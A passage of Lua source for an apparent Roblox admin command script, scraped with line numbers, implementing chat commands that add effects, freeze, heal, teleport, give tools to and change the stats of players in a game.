  3084.  
  3085.  
  3086. 1029.coroutine.resume(coroutine.create(function()
  3087.  
  3088.  
  3089. 1030.if v and v.Character and v.Character:findFirstChild("Torso") then
  3090.  
  3091.  
  3092. 1031.local cl = Instance.new("Smoke", v.Character.Torso) table.insert(objects, cl)
  3093.  
  3094.  
  3095. 1032.end
  3096.  
  3097.  
  3098. 1033.end))
  3099.  
  3100.  
  3101. 1034.end
  3102.  
  3103.  
  3104. 1035.end
  3105.  
  3106.  
  3107. 1036.
  3108.  
  3109.  
  3110. 1037.if msg:lower():sub(1,8) == "unsmoke " then
  3111.  
  3112.  
  3113. 1038.local plrz = GetPlr(plr, msg:lower():sub(9))
  3114.  
  3115.  
  3116. 1039.for i, v in pairs(plrz) do
  3117.  
  3118.  
  3119. 1040.coroutine.resume(coroutine.create(function()
  3120.  
  3121.  
  3122. 1041.if v and v.Character and v.Character:findFirstChild("Torso") then
  3123.  
  3124.  
  3125. 1042.for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Smoke") then cl:Destroy() end end
  3126.  
  3127.  
  3128. 1043.end
  3129.  
  3130.  
  3131. 1044.end))
  3132.  
  3133.  
  3134. 1045.end
  3135.  
  3136.  
  3137. 1046.end
  3138.  
  3139.  
  3140. 1047.
  3141.  
  3142.  
  3143. 1048.if msg:lower():sub(1,9) == "sparkles " then
  3144.  
  3145.  
  3146. 1049.local plrz = GetPlr(plr, msg:lower():sub(10))
  3147.  
  3148.  
  3149. 1050.for i, v in pairs(plrz) do
  3150.  
  3151.  
  3152. 1051.coroutine.resume(coroutine.create(function()
  3153.  
  3154.  
  3155. 1052.if v and v.Character and v.Character:findFirstChild("Torso") then
  3156.  
  3157.  
  3158. 1053.local cl = Instance.new("Sparkles", v.Character.Torso) table.insert(objects, cl)
  3159.  
  3160.  
  3161. 1054.end
  3162.  
  3163.  
  3164. 1055.end))
  3165.  
  3166.  
  3167. 1056.end
  3168.  
  3169.  
  3170. 1057.end
  3171.  
  3172.  
  3173. 1058.
  3174.  
  3175.  
  3176. 1059.if msg:lower():sub(1,11) == "unsparkles " then
  3177.  
  3178.  
  3179. 1060.local plrz = GetPlr(plr, msg:lower():sub(12))
  3180.  
  3181.  
  3182. 1061.for i, v in pairs(plrz) do
  3183.  
  3184.  
  3185. 1062.coroutine.resume(coroutine.create(function()
  3186.  
  3187.  
  3188. 1063.if v and v.Character and v.Character:findFirstChild("Torso") then
  3189.  
  3190.  
  3191. 1064.for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Sparkles") then cl:Destroy() end end
  3192.  
  3193.  
  3194. 1065.end
  3195.  
  3196.  
  3197. 1066.end))
  3198.  
  3199.  
  3200. 1067.end
  3201.  
  3202.  
  3203. 1068.end
  3204.  
  3205.  
  3206. 1069.
  3207.  
  3208.  
  3209. 1070.if msg:lower():sub(1,3) == "ff " then
  3210.  
  3211.  
  3212. 1071.local plrz = GetPlr(plr, msg:lower():sub(4))
  3213.  
  3214.  
  3215. 1072.for i, v in pairs(plrz) do
  3216.  
  3217.  
  3218. 1073.coroutine.resume(coroutine.create(function()
  3219.  
  3220.  
  3221. 1074.if v and v.Character then Instance.new("ForceField", v.Character) end
  3222.  
  3223.  
  3224. 1075.end))
  3225.  
  3226.  
  3227. 1076.end
  3228.  
  3229.  
  3230. 1077.end
  3231.  
  3232.  
  3233. 1078.
  3234.  
  3235.  
  3236. 1079.if msg:lower():sub(1,5) == "unff " then
  3237.  
  3238.  
  3239. 1080.local plrz = GetPlr(plr, msg:lower():sub(6))
  3240.  
  3241.  
  3242. 1081.for i, v in pairs(plrz) do
  3243.  
  3244.  
  3245. 1082.coroutine.resume(coroutine.create(function()
  3246.  
  3247.  
  3248. 1083.if v and v.Character then
  3249.  
  3250.  
  3251. 1084.for z, cl in pairs(v.Character:children()) do if cl:IsA("ForceField") then cl:Destroy() end end
  3252.  
  3253.  
  3254. 1085.end
  3255.  
  3256.  
  3257. 1086.end))
  3258.  
  3259.  
  3260. 1087.end
  3261.  
  3262.  
  3263. 1088.end
  3264.  
  3265.  
  3266. 1089.
  3267.  
  3268.  
  3269. 1090.if msg:lower():sub(1,7) == "punish " then
  3270.  
  3271.  
  3272. 1091.local plrz = GetPlr(plr, msg:lower():sub(8))
  3273.  
  3274.  
  3275. 1092.for i, v in pairs(plrz) do
  3276.  
  3277.  
  3278. 1093.coroutine.resume(coroutine.create(function()
  3279.  
  3280.  
  3281. 1094.if v and v.Character then
  3282.  
  3283.  
  3284. 1095.v.Character.Parent = game:service("Lighting")
  3285.  
  3286.  
  3287. 1096.end
  3288.  
  3289.  
  3290. 1097.end))
  3291.  
  3292.  
  3293. 1098.end
  3294.  
  3295.  
  3296. 1099.end
  3297.  
  3298.  
  3299. 1100.
  3300.  
  3301.  
  3302. 1101.if msg:lower():sub(1,9) == "unpunish " then
  3303.  
  3304.  
  3305. 1102.local plrz = GetPlr(plr, msg:lower():sub(10))
  3306.  
  3307.  
  3308. 1103.for i, v in pairs(plrz) do
  3309.  
  3310.  
  3311. 1104.coroutine.resume(coroutine.create(function()
  3312.  
  3313.  
  3314. 1105.if v and v.Character then
  3315.  
  3316.  
  3317. 1106.v.Character.Parent = game:service("Workspace")
  3318.  
  3319.  
  3320. 1107.v.Character:MakeJoints()
  3321.  
  3322.  
  3323. 1108.end
  3324.  
  3325.  
  3326. 1109.end))
  3327.  
  3328.  
  3329. 1110.end
  3330.  
  3331.  
  3332. 1111.end
  3333.  
  3334.  
  3335. 1112.
  3336.  
  3337.  
  3338. 1113.if msg:lower():sub(1,7) == "freeze " then
  3339.  
  3340.  
  3341. 1114.local plrz = GetPlr(plr, msg:lower():sub(8))
  3342.  
  3343.  
  3344. 1115.for i, v in pairs(plrz) do
  3345.  
  3346.  
  3347. 1116.coroutine.resume(coroutine.create(function()
  3348.  
  3349.  
  3350. 1117.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  3351.  
  3352.  
  3353. 1118.for a, obj in pairs(v.Character:children()) do
  3354.  
  3355.  
  3356. 1119.if obj:IsA("BasePart") then obj.Anchored = true end v.Character.Humanoid.WalkSpeed = 0
  3357.  
  3358.  
  3359. 1120.end
  3360.  
  3361.  
  3362. 1121.end
  3363.  
  3364.  
  3365. 1122.end))
  3366.  
  3367.  
  3368. 1123.end
  3369.  
  3370.  
  3371. 1124.end
  3372.  
  3373.  
  3374. 1125.
  3375.  
  3376.  
  3377. 1126.if msg:lower():sub(1,5) == "thaw " then
  3378.  
  3379.  
  3380. 1127.local plrz = GetPlr(plr, msg:lower():sub(6))
  3381.  
  3382.  
  3383. 1128.for i, v in pairs(plrz) do
  3384.  
  3385.  
  3386. 1129.coroutine.resume(coroutine.create(function()
  3387.  
  3388.  
  3389. 1130.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  3390.  
  3391.  
  3392. 1131.for a, obj in pairs(v.Character:children()) do
  3393.  
  3394.  
  3395. 1132.if obj:IsA("BasePart") then obj.Anchored = false end v.Character.Humanoid.WalkSpeed = 16
  3396.  
  3397.  
  3398. 1133.end
  3399.  
  3400.  
  3401. 1134.end
  3402.  
  3403.  
  3404. 1135.end))
  3405.  
  3406.  
  3407. 1136.end
  3408.  
  3409.  
  3410. 1137.end
  3411.  
  3412.  
  3413. 1138.
  3414.  
  3415.  
  3416. 1139.if msg:lower():sub(1,5) == "heal " then
  3417.  
  3418.  
  3419. 1140.local plrz = GetPlr(plr, msg:lower():sub(6))
  3420.  
  3421.  
  3422. 1141.for i, v in pairs(plrz) do
  3423.  
  3424.  
  3425. 1142.coroutine.resume(coroutine.create(function()
  3426.  
  3427.  
  3428. 1143.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  3429.  
  3430.  
  3431. 1144.v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  3432.  
  3433.  
  3434. 1145.end
  3435.  
  3436.  
  3437. 1146.end))
  3438.  
  3439.  
  3440. 1147.end
  3441.  
  3442.  
  3443. 1148.end
  3444.  
  3445.  
  3446. 1149.
  3447.  
  3448.  
  3449. 1150.if msg:lower():sub(1,4) == "god " then
  3450.  
  3451.  
  3452. 1151.local plrz = GetPlr(plr, msg:lower():sub(5))
  3453.  
  3454.  
  3455. 1152.for i, v in pairs(plrz) do
  3456.  
  3457.  
  3458. 1153.coroutine.resume(coroutine.create(function()
  3459.  
  3460.  
  3461. 1154.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  3462.  
  3463.  
  3464. 1155.v.Character.Humanoid.MaxHealth = math.huge
  3465.  
  3466.  
  3467. 1156.v.Character.Humanoid.Health = 9e9
  3468.  
  3469.  
  3470. 1157.end
  3471.  
  3472.  
  3473. 1158.end))
  3474.  
  3475.  
  3476. 1159.end
  3477.  
  3478.  
  3479. 1160.end
  3480.  
  3481.  
  3482. 1161.
  3483.  
  3484.  
  3485. 1162.if msg:lower():sub(1,6) == "ungod " then
  3486.  
  3487.  
  3488. 1163.local plrz = GetPlr(plr, msg:lower():sub(7))
  3489.  
  3490.  
  3491. 1164.for i, v in pairs(plrz) do
  3492.  
  3493.  
  3494. 1165.coroutine.resume(coroutine.create(function()
  3495.  
  3496.  
  3497. 1166.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  3498.  
  3499.  
  3500. 1167.v.Character.Humanoid.MaxHealth = 100
  3501.  
  3502.  
  3503. 1168.v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  3504.  
  3505.  
  3506. 1169.end
  3507.  
  3508.  
  3509. 1170.end))
  3510.  
  3511.  
  3512. 1171.end
  3513.  
  3514.  
  3515. 1172.end
  3516.  
  3517.  
  3518. 1173.
  3519.  
  3520.  
  3521. 1174.if msg:lower():sub(1,8) == "ambient " then
  3522.  
  3523.  
  3524. 1175.local chk1 = msg:lower():sub(9):find(" ") + 8
  3525.  
  3526.  
  3527. 1176.local chk2 = msg:sub(chk1+1):find(" ") + chk1
  3528.  
  3529.  
  3530. 1177.game.Lighting.Ambient = Color3.new(msg:sub(9,chk1-1),msg:sub(chk1+1,chk2-1),msg:sub(chk2+1))
  3531.  
  3532.  
  3533. 1178.end
  3534.  
  3535.  
  3536. 1179.
  3537.  
  3538.  
  3539. 1180.if msg:lower():sub(1,11) == "brightness " then
  3540.  
  3541.  
  3542. 1181.game.Lighting.Brightness = msg:sub(12)
  3543.  
  3544.  
  3545. 1182.end
  3546.  
  3547.  
  3548. 1183.
  3549.  
  3550.  
  3551. 1184.if msg:lower():sub(1,5) == "time " then
  3552.  
  3553.  
  3554. 1185.game.Lighting.TimeOfDay = msg:sub(6)
  3555.  
  3556.  
  3557. 1186.end
  3558.  
  3559.  
  3560. 1187.
  3561.  
  3562.  
  3563. 1188.if msg:lower():sub(1,9) == "fogcolor " then
  3564.  
  3565.  
  3566. 1189.local chk1 = msg:lower():sub(10):find(" ") + 9
  3567.  
  3568.  
  3569. 1190.local chk2 = msg:sub(chk1+1):find(" ") + chk1
  3570.  
  3571.  
  3572. 1191.game.Lighting.FogColor = Color3.new(msg:sub(10,chk1-1),msg:sub(chk1+1,chk2-1),msg:sub(chk2+1))
  3573.  
  3574.  
  3575. 1192.end
  3576.  
  3577.  
  3578. 1193.
  3579.  
  3580.  
  3581. 1194.if msg:lower():sub(1,7) == "fogend " then
  3582.  
  3583.  
  3584. 1195.game.Lighting.FogEnd = msg:sub(8)
  3585.  
  3586.  
  3587. 1196.end
  3588.  
  3589.  
  3590. 1197.
  3591.  
  3592.  
  3593. 1198.if msg:lower():sub(1,9) == "fogstart " then
  3594.  
  3595.  
  3596. 1199.game.Lighting.FogStart = msg:sub(10)
  3597.  
  3598.  
  3599. 1200.end
  3600.  
  3601.  
  3602. 1201.
  3603.  
  3604.  
  3605. 1202.if msg:lower():sub(1,7) == "btools " then
  3606.  
  3607.  
  3608. 1203.local plrz = GetPlr(plr, msg:lower():sub(8))
  3609.  
  3610.  
  3611. 1204.for i, v in pairs(plrz) do
  3612.  
  3613.  
  3614. 1205.coroutine.resume(coroutine.create(function()
  3615.  
  3616.  
  3617. 1206.if v and v:findFirstChild("Backpack") then
  3618.  
  3619.  
  3620. 1207.local t1 = Instance.new("HopperBin", v.Backpack) t1.Name = "Move" t1.BinType = "GameTool"
  3621.  
  3622.  
  3623. 1208.local t2 = Instance.new("HopperBin", v.Backpack) t2.Name = "Clone" t2.BinType = "Clone"
  3624.  
  3625.  
  3626. 1209.local t3 = Instance.new("HopperBin", v.Backpack) t3.Name = "Delete" t3.BinType = "Hammer"
  3627.  
  3628.  
  3629. 1210.local t4= Instance.new("HopperBin", v.Backpack) t4.Name = "Resize"
  3630.  
  3631.  
  3632. 1211.local cl4 = script.LocalScriptBase:Clone() cl4.Parent = t4 cl4.Code.Value = [[
  3633.  
  3634.  
  3635. 1212.repeat wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer:findFirstChild("PlayerGui")
  3636.  
  3637.  
  3638. 1213.local sb
  3639.  
  3640.  
  3641. 1214.local hs
  3642.  
  3643.  
  3644. 1215.local pdist
  3645.  
  3646.  
  3647. 1216.
  3648.  
  3649.  
  3650. 1217.script.Parent.Selected:connect(function(mouse)
  3651.  
  3652.  
  3653. 1218.if not mouse then return end
  3654.  
  3655.  
  3656. 1219.sb = Instance.new("SelectionBox", game.Players.LocalPlayer.PlayerGui) sb.Color = BrickColor.new("Bright blue") sb.Adornee = nil
  3657.  
  3658.  
  3659. 1220.hs = Instance.new("Handles", game.Players.LocalPlayer.PlayerGui) hs.Color = BrickColor.new("Bright blue") hs.Adornee = nil
  3660.  
  3661.  
  3662. 1221.mouse.Button1Down:connect(function() if not mouse.Target or mouse.Target.Locked then sb.Adornee = nil hs.Adornee = nil else sb.Adornee = mouse.Target hs.Adornee = mouse.Target hs.Faces = mouse.Target.ResizeableFaces end end)
  3663.  
  3664.  
  3665. 1222.hs.MouseDrag:connect(function(old,dist) if hs.Adornee and math.abs(dist-pdist) >= hs.Adornee.ResizeIncrement then if hs.Adornee:Resize(old, math.floor((dist-pdist)/ hs.Adornee.ResizeIncrement + .5) * hs.Adornee.ResizeIncrement) then pdist = dist end end end)
  3666.  
  3667.  
  3668. 1223.hs.MouseButton1Down:connect(function() pdist = 0 end)
  3669.  
  3670.  
  3671. 1224.end)
  3672.  
  3673.  
  3674. 1225.
  3675.  
  3676.  
  3677. 1226.script.Parent.Deselected:connect(function() sb:Destroy() hs:Destroy() end)]] cl4.Disabled = false
  3678.  
  3679.  
  3680. 1227.end
  3681.  
  3682.  
  3683. 1228.end))
  3684.  
  3685.  
  3686. 1229.end
  3687.  
  3688.  
  3689. 1230.end
  3690.  
  3691.  
  3692. 1231.
  3693.  
  3694.  
  3695. 1232.if msg:lower():sub(1,12) == "startergive " then
  3696.  
  3697.  
  3698. 1233.local chk1 = msg:lower():sub(13):find(" ") + 12
  3699.  
  3700.  
  3701. 1234.local plrz = GetPlr(plr, msg:lower():sub(13,chk1-1))
  3702.  
  3703.  
  3704. 1235.for i, v in pairs(plrz) do
  3705.  
  3706.  
  3707. 1236.coroutine.resume(coroutine.create(function()
  3708.  
  3709.  
  3710. 1237.if v and v:findFirstChild("StarterGear") and game:findFirstChild("Lighting") then
  3711.  
  3712.  
  3713. 1238.for a, tool in pairs(game.Lighting:children()) do
  3714.  
  3715.  
  3716. 1239.if tool:IsA("Tool") or tool:IsA("HopperBin") then
  3717.  
  3718.  
  3719. 1240.if msg:lower():sub(chk1+1) == "all" or tool.Name:lower():find(msg:lower():sub(chk1+1)) == 1 then tool:Clone().Parent = v.StarterGear end
  3720.  
  3721.  
  3722. 1241.end
  3723.  
  3724.  
  3725. 1242.end
  3726.  
  3727.  
  3728. 1243.end
  3729.  
  3730.  
  3731. 1244.end))
  3732.  
  3733.  
  3734. 1245.end
  3735.  
  3736.  
  3737. 1246.end
  3738.  
  3739.  
  3740. 1247.
  3741.  
  3742.  
  3743. 1248.if msg:lower():sub(1,5) == "give " then
  3744.  
  3745.  
  3746. 1249.local chk1 = msg:lower():sub(6):find(" ") + 5
  3747.  
  3748.  
  3749. 1250.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  3750.  
  3751.  
  3752. 1251.for i, v in pairs(plrz) do
  3753.  
  3754.  
  3755. 1252.coroutine.resume(coroutine.create(function()
  3756.  
  3757.  
  3758. 1253.if v and v:findFirstChild("Backpack") and game:findFirstChild("Lighting") then
  3759.  
  3760.  
  3761. 1254.for a, tool in pairs(game.Lighting:children()) do
  3762.  
  3763.  
  3764. 1255.if tool:IsA("Tool") or tool:IsA("HopperBin") then
  3765.  
  3766.  
  3767. 1256.if msg:lower():sub(chk1+1) == "all" or tool.Name:lower():find(msg:lower():sub(chk1+1)) == 1 then tool:Clone().Parent = v.Backpack end
  3768.  
  3769.  
  3770. 1257.end
  3771.  
  3772.  
  3773. 1258.end
  3774.  
  3775.  
  3776. 1259.end
  3777.  
  3778.  
  3779. 1260.end))
  3780.  
  3781.  
  3782. 1261.end
  3783.  
  3784.  
  3785. 1262.end
  3786.  
  3787.  
  3788. 1263.
  3789.  
  3790.  
  3791. 1264.if msg:lower():sub(1,12) == "removetools " then
  3792.  
  3793.  
  3794. 1265.local plrz = GetPlr(plr, msg:lower():sub(13))
  3795.  
  3796.  
  3797. 1266.for i, v in pairs(plrz) do
  3798.  
  3799.  
  3800. 1267.coroutine.resume(coroutine.create(function()
  3801.  
  3802.  
  3803. 1268.if v and v.Character and v:findFirstChild("Backpack") then
  3804.  
  3805.  
  3806. 1269.for a, tool in pairs(v.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  3807.  
  3808.  
  3809. 1270.for a, tool in pairs(v.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  3810.  
  3811.  
  3812. 1271.end
  3813.  
  3814.  
  3815. 1272.end))
  3816.  
  3817.  
  3818. 1273.end
  3819.  
  3820.  
  3821. 1274.end
  3822.  
  3823.  
  3824. 1275.
  3825.  
  3826.  
  3827. 1276.if msg:lower():sub(1,5) == "rank " then
  3828.  
  3829.  
  3830. 1277.local chk1 = msg:lower():sub(6):find(" ") + 5
  3831.  
  3832.  
  3833. 1278.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  3834.  
  3835.  
  3836. 1279.for i, v in pairs(plrz) do
  3837.  
  3838.  
  3839. 1280.coroutine.resume(coroutine.create(function()
  3840.  
  3841.  
  3842. 1281.if v and v:IsInGroup(msg:sub(chk1+1)) then
  3843.  
  3844.  
  3845. 1282.Hint("[" .. v:GetRankInGroup(msg:sub(chk1+1)) .. "] " .. v:GetRoleInGroup(msg:sub(chk1+1)), {plr})
  3846.  
  3847.  
  3848. 1283.elseif v and not v:IsInGroup(msg:sub(chk1+1))then
  3849.  
  3850.  
  3851. 1284.Hint(v.Name .. " is not in the group " .. msg:sub(chk1+1), {plr})
  3852.  
  3853.  
  3854. 1285.end
  3855.  
  3856.  
  3857. 1286.end))
  3858.  
  3859.  
  3860. 1287.end
  3861.  
  3862.  
  3863. 1288.end
  3864.  
  3865.  
  3866. 1289.
  3867.  
  3868.  
  3869. 1290.if msg:lower():sub(1,7) == "damage " then
  3870.  
  3871.  
  3872. 1291.local chk1 = msg:lower():sub(8):find(" ") + 7
  3873.  
  3874.  
  3875. 1292.local plrz = GetPlr(plr, msg:lower():sub(8,chk1-1))
  3876.  
  3877.  
  3878. 1293.for i, v in pairs(plrz) do
  3879.  
  3880.  
  3881. 1294.coroutine.resume(coroutine.create(function()
  3882.  
  3883.  
  3884. 1295.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  3885.  
  3886.  
  3887. 1296.v.Character.Humanoid:TakeDamage(msg:sub(chk1+1))
  3888.  
  3889.  
  3890. 1297.end
  3891.  
  3892.  
  3893. 1298.end))
  3894.  
  3895.  
  3896. 1299.end
  3897.  
  3898.  
  3899. 1300.end
  3900.  
  3901.  
  3902. 1301.
  3903.  
  3904.  
  3905. 1302.if msg:lower():sub(1,5) == "grav " then
  3906.  
  3907.  
  3908. 1303.local plrz = GetPlr(plr, msg:lower():sub(6))
  3909.  
  3910.  
  3911. 1304.for i, v in pairs(plrz) do
  3912.  
  3913.  
  3914. 1305.coroutine.resume(coroutine.create(function()
  3915.  
  3916.  
  3917. 1306.if v and v.Character and v.Character:findFirstChild("Torso") then
  3918.  
  3919.  
  3920. 1307.for a, frc in pairs(v.Character.Torso:children()) do if frc.Name == "BFRC" then frc:Destroy() end end
  3921.  
  3922.  
  3923. 1308.end
  3924.  
  3925.  
  3926. 1309.end))
  3927.  
  3928.  
  3929. 1310.end
  3930.  
  3931.  
  3932. 1311.end
  3933.  
  3934.  
  3935. 1312.
  3936.  
  3937.  
  3938. 1313.if msg:lower():sub(1,8) == "setgrav " then
  3939.  
  3940.  
  3941. 1314.local chk1 = msg:lower():sub(9):find(" ") + 8
  3942.  
  3943.  
  3944. 1315.local plrz = GetPlr(plr, msg:lower():sub(9,chk1-1))
  3945.  
  3946.  
  3947. 1316.for i, v in pairs(plrz) do
  3948.  
  3949.  
  3950. 1317.coroutine.resume(coroutine.create(function()
  3951.  
  3952.  
  3953. 1318.if v and v.Character and v.Character:findFirstChild("Torso") then
  3954.  
  3955.  
  3956. 1319.for a, frc in pairs(v.Character.Torso:children()) do if frc.Name == "BFRC" then frc:Destroy() end end
  3957.  
  3958.  
  3959. 1320.local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(0,0,0)
  3960.  
  3961.  
  3962. 1321.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") then frc.force = frc.force - Vector3.new(0,prt:GetMass()*msg:sub(chk1+1),0) elseif prt:IsA("Hat") then frc.force = frc.force - Vector3.new(0,prt.Handle:GetMass()*msg:sub(chk1+1),0) end end
  3963.  
  3964.  
  3965. 1322.end
  3966.  
  3967.  
  3968. 1323.end))
  3969.  
  3970.  
  3971. 1324.end
  3972.  
  3973.  
  3974. 1325.end
  3975.  
  3976.  
  3977. 1326.
  3978.  
  3979.  
  3980. 1327.if msg:lower():sub(1,7) == "nograv " then
  3981.  
  3982.  
  3983. 1328.local plrz = GetPlr(plr, msg:lower():sub(8))
  3984.  
  3985.  
  3986. 1329.for i, v in pairs(plrz) do
  3987.  
  3988.  
  3989. 1330.coroutine.resume(coroutine.create(function()
  3990.  
  3991.  
  3992. 1331.if v and v.Character and v.Character:findFirstChild("Torso") then
  3993.  
  3994.  
  3995. 1332.for a, frc in pairs(v.Character.Torso:children()) do if frc.Name == "BFRC" then frc:Destroy() end end
  3996.  
  3997.  
  3998. 1333.local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(0,0,0)
  3999.  
  4000.  
  4001. 1334.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") then frc.force = frc.force + Vector3.new(0,prt:GetMass()*196.25,0) elseif prt:IsA("Hat") then frc.force = frc.force + Vector3.new(0,prt.Handle:GetMass()*196.25,0) end end
  4002.  
  4003.  
  4004. 1335.end
  4005.  
  4006.  
  4007. 1336.end))
  4008.  
  4009.  
  4010. 1337.end
  4011.  
  4012.  
  4013. 1338.end
  4014.  
  4015.  
  4016. 1339.
  4017.  
  4018.  
  4019. 1340.if msg:lower():sub(1,7) == "health " then
  4020.  
  4021.  
  4022. 1341.local chk1 = msg:lower():sub(8):find(" ") + 7
  4023.  
  4024.  
  4025. 1342.local plrz = GetPlr(plr, msg:lower():sub(8,chk1-1))
  4026.  
  4027.  
  4028. 1343.for i, v in pairs(plrz) do
  4029.  
  4030.  
  4031. 1344.coroutine.resume(coroutine.create(function()
  4032.  
  4033.  
  4034. 1345.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  4035.  
  4036.  
  4037. 1346.v.Character.Humanoid.MaxHealth = msg:sub(chk1+1)
  4038.  
  4039.  
  4040. 1347.v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  4041.  
  4042.  
  4043. 1348.end
  4044.  
  4045.  
  4046. 1349.end))
  4047.  
  4048.  
  4049. 1350.end
  4050.  
  4051.  
  4052. 1351.end
  4053.  
  4054.  
  4055. 1352.
  4056.  
  4057.  
  4058. 1353.if msg:lower():sub(1,6) == "speed " then
  4059.  
  4060.  
  4061. 1354.local chk1 = msg:lower():sub(7):find(" ") + 6
  4062.  
  4063.  
  4064. 1355.local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  4065.  
  4066.  
  4067. 1356.for i, v in pairs(plrz) do
  4068.  
  4069.  
  4070. 1357.coroutine.resume(coroutine.create(function()
  4071.  
  4072.  
  4073. 1358.if v and v.Character and v.Character:findFirstChild("Humanoid") then
  4074.  
  4075.  
  4076. 1359.v.Character.Humanoid.WalkSpeed = msg:sub(chk1+1)
  4077.  
  4078.  
  4079. 1360.end
  4080.  
  4081.  
  4082. 1361.end))
  4083.  
  4084.  
  4085. 1362.end
  4086.  
  4087.  
  4088. 1363.end
  4089.  
  4090.  
  4091. 1364.
  4092.  
  4093.  
  4094. 1365.if msg:lower():sub(1,5) == "team " then
  4095.  
  4096.  
  4097. 1366.local chk1 = msg:lower():sub(6):find(" ") + 5
  4098.  
  4099.  
  4100. 1367.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  4101.  
  4102.  
  4103. 1368.for i, v in pairs(plrz) do
  4104.  
  4105.  
  4106. 1369.coroutine.resume(coroutine.create(function()
  4107.  
  4108.  
  4109. 1370.if v and game:findFirstChild("Teams") then
  4110.  
  4111.  
  4112. 1371.for a, tm in pairs(game.Teams:children()) do
  4113.  
  4114.  
  4115. 1372.if tm.Name:lower():find(msg:lower():sub(chk1+1)) == 1 then v.TeamColor = tm.TeamColor end
  4116.  
  4117.  
  4118. 1373.end
  4119.  
  4120.  
  4121. 1374.end
  4122.  
  4123.  
  4124. 1375.end))
  4125.  
  4126.  
  4127. 1376.end
  4128.  
  4129.  
  4130. 1377.end
  4131.  
  4132.  
  4133. 1378.
  4134.  
  4135.  
  4136. 1379.if msg:lower():sub(1,6) == "place " then
  4137.  
  4138.  
  4139. 1380.local chk1 = msg:lower():sub(7):find(" ") + 6
  4140.  
  4141.  
  4142. 1381.local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  4143.  
  4144.  
  4145. 1382.for i, v in pairs(plrz) do
  4146.  
  4147.  
  4148. 1383.coroutine.resume(coroutine.create(function()
  4149.  
  4150.  
  4151. 1384.if v and v:findFirstChild("PlayerGui") then
  4152.  
  4153.  
  4154. 1385.local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[game:service("TeleportService"):Teleport(]] .. msg:sub(chk1+1) .. ")" cl.Parent = v.PlayerGui cl.Disabled = false
  4155.  
  4156.  
  4157. 1386.end
  4158.  
  4159.  
  4160. 1387.end))
  4161.  
  4162.  
  4163. 1388.end
  4164.  
  4165.  
  4166. 1389.end
  4167.  
  4168.  
  4169. 1390.
  4170.  
  4171.  
  4172. 1391.if msg:lower():sub(1,3) == "tp " then
  4173.  
  4174.  
  4175. 1392.local chk1 = msg:lower():sub(4):find(" ") + 3
  4176.  
  4177.  
  4178. 1393.local plrz = GetPlr(plr, msg:lower():sub(4,chk1-1))
  4179.  
  4180.  
  4181. 1394.local plrz2 = GetPlr(plr, msg:lower():sub(chk1+1))
  4182.  
  4183.  
  4184. 1395.for i, v in pairs(plrz) do
  4185.  
  4186.  
  4187. 1396.coroutine.resume(coroutine.create(function()
  4188.  
  4189.  
  4190. 1397.for i2, v2 in pairs(plrz2) do
  4191.  
  4192.  
  4193. 1398.if v and v2 and v.Character and v2.Character and v.Character:findFirstChild("Torso") and v2.Character:findFirstChild("Torso") then
  4194.  
  4195.  
  4196. 1399.v.Character.Torso.CFrame = v2.Character.Torso.CFrame + Vector3.new(math.random(-1,1),0,math.random(-1,1))
  4197.  
  4198.  
  4199. 1400.end
  4200.  
  4201.  
  4202. 1401.end
  4203.  
  4204.  
  4205. 1402.end))
  4206.  
  4207.  
  4208. 1403.end
  4209.  
  4210.  
  4211. 1404.end
  4212.  
  4213.  
  4214. 1405.
  4215.  
  4216.  
  4217. 1406.if msg:lower():sub(1,7) == "change " then
  4218.  
  4219.  
  4220. 1407.local chk1 = msg:lower():sub(8):find(" ") + 7
  4221.  
  4222.  
  4223. 1408.local chk2 = msg:sub(chk1+1):find(" ") + chk1
  4224.  
  4225.  
  4226. 1409.local plrz = GetPlr(plr, msg:lower():sub(8,chk1-1))
  4227.  
  4228.  
  4229. 1410.for i, v in pairs(plrz) do
  4230.  
  4231.  
  4232. 1411.coroutine.resume(coroutine.create(function()
  4233.  
  4234.  
  4235. 1412.if v and v:findFirstChild("leaderstats") then
  4236.  
  4237.  
  4238. 1413.for a, st in pairs(v.leaderstats:children()) do
  4239.  
  4240.  
  4241. 1414.if st.Name:lower():find(msg:sub(chk1+1,chk2-1)) == 1 then st.Value = msg:sub(chk2+1) end
  4242.  
  4243.  
  4244. 1415.end
  4245.  
  4246.  
  4247. 1416.end
  4248.  
  4249.  
  4250. 1417.end))
  4251.  
  4252.  
  4253. 1418.end
  4254.  
  4255.  
  4256. 1419.end
  4257.  
  4258.  
  4259. 1420.
  4260.  
  4261.  
  4262. 1421.if msg:lower():sub(1,6) == "shirt " then
  4263.  
  4264.  
  4265. 1422.local chk1 = msg:lower():sub(7):find(" ") + 6
  4266.  
  4267.  
  4268. 1423.local plrz = GetPlr(plr, msg:lower():sub(7,chk1-1))
  4269.  
  4270.  
  4271. 1424.for i, v in pairs(plrz) do
  4272.  
  4273.  
  4274. 1425.coroutine.resume(coroutine.create(function()
  4275.  
  4276.  
  4277. 1426.if v and v.Character then
  4278.  
  4279.  
  4280. 1427.for i,v in pairs(v.Character:children()) do
  4281.  
  4282.  
